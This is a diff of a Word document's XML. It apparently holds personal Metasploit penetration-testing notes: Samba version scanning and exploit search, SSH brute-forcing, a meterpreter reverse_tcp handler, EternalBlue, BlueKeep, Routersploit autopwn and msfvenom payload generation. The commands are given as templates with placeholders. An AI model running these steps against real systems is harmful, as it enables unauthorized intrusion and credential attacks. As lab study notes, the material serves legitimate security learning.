+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>SMB</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchs samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FIND THE VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>info</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or show options</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> or show payloads</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set RHOSTS {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>GET VERSION</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>REPEAT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit Samba 3.0.20</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: user {PATHNAME}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: show payloads</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: set payload {PAYLOAD-NAME} </w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>BRUTEFORCE</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> attack</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: search SSH</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/ssh/ssh_login</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show info</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: set </w:t>
+            </w:r>
+            <w:r>
+              <w:t>PASS_FILE</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> {filepath}</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {version}</w:t>
+            <w:r>
+              <w:t>USER_FILE</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3616,636 +3206,93 @@
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
             <w:r>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ear</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">ch </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> version</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use exploit/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>unix</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/-&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: show </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>payploads</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> or show options</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: set target {number}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: exploit</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
+              <w:t>SET RHOST</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve"> CL: run</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>CL: s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>essions</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>sessions</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FROM DESKTOP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Use exploit/multi/handler</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>Netcat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – allow connection to UDP and TCP</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -help</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Telnet</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Linux </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>tetnetd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: search Linux </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>telnetd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>CL: telnet {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>SMB</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchs</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>FIND THE VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb_version</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/{VERSION}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: show </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>info</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> or show options</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> or show payloads</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: set RHOSTS {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: run</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>GET VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>REPEAT</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> Samba 3.0.20</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: user {PATHNAME}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>CL: show payloads</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: set payload {PAYLOAD-NAME} </w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>BRUTEFORCE</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>–</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> attack</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> SSH</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: search SSH</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ssh</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ssh_login</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: show info</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: set </w:t>
-            </w:r>
-            <w:r>
-              <w:t>PASS_FILE</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>filepath</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:t>USER_FILE</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:t>SET RHOST</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve"> CL: run</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>CL: s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>essions</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>sessions</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 1</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>FROM DESKTOP</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ssh</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfadmin</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>@{IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>Use exploit/multi/handler</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>CL: set payload windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>meterpreter</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>reverse_tcp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>CL: set payload windows/meterpreter/reverse_tcp</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4318,13 +3365,8 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL: search </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>eternalblue</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL: search eternalblue</w:t>
+            </w:r>
           </w:p>
           <w:p/>
         </w:tc>
@@ -4345,14 +3387,12 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>DoublePulsar</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -4373,36 +3413,13 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>su</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dpkg</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
+            <w:r>
+              <w:t>Sudo su</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Sudo dpkg –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4427,19 +3444,11 @@
                 <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>BlueKeep</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -RDP Vulnerability</w:t>
+              <w:t>BlueKeep -RDP Vulnerability</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4468,14 +3477,12 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>Routersploit</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4506,13 +3513,8 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Follow the instructions in </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>github</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Follow the instructions in github</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -4639,21 +3641,8 @@
                 <w:szCs w:val="20"/>
                 <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
               </w:rPr>
-              <w:t xml:space="preserve">cd </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:b/>
-                <w:bCs/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-              </w:rPr>
-              <w:t>routersploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>cd routersploit</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -4754,13 +3743,8 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use scanners/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>autopwn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>CL: use scanners/autopwn</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -4858,21 +3842,7 @@
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t xml:space="preserve">Gaining </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t>Access(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="green"/>
-              </w:rPr>
-              <w:t>Viruses, Trojan, Payloads)</w:t>
+              <w:t>Gaining Access(Viruses, Trojan, Payloads)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4895,18 +3865,8 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Note: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Note: msfvenom</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4940,15 +3900,7 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">CL: </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -h</w:t>
+              <w:t>CL: msfvenom -h</w:t>
             </w:r>
             <w:r>
               <w:t>elp or -h</w:t>
@@ -4956,15 +3908,8 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>CL:msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -p</w:t>
+            <w:r>
+              <w:t>CL:msfvenom -p</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4976,31 +3921,12 @@
               <w:t>:</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>msfvenom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –list venom</w:t>
-            </w:r>
-          </w:p>
